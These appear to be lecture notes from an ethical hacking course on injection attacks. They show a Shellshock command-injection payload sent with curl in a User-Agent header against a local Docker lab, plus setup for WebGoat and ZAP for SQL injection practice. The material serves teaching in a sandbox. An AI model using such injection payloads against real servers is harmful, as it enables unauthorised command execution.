IT 4510 : Ethical Hacking
Injections
Dr Joe Francom
Command Injection
- Shellshock
- Example:
docker run -d --rm -p 8888:80 joelongtoe/shellshock-example
curl -A '() { :;}; echo "Content-Type: text/plain"; echo; /bin/ls /' http://127.0.0.1:8888/cgi-bin/welcome.sh
- You can view the contents of that welcome script in:
cat /usr/lib/cgi-bin/welcome.sh
. Maybe by doing docker exec pensive_mendeleev /bin/cat /usr/lib/cgi-bin/welcome.sh
SQL Injection
Zap and Goat
docker run --rm -d -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=America/Boise webgoat/goatandwolf
sudo apt install zaproxy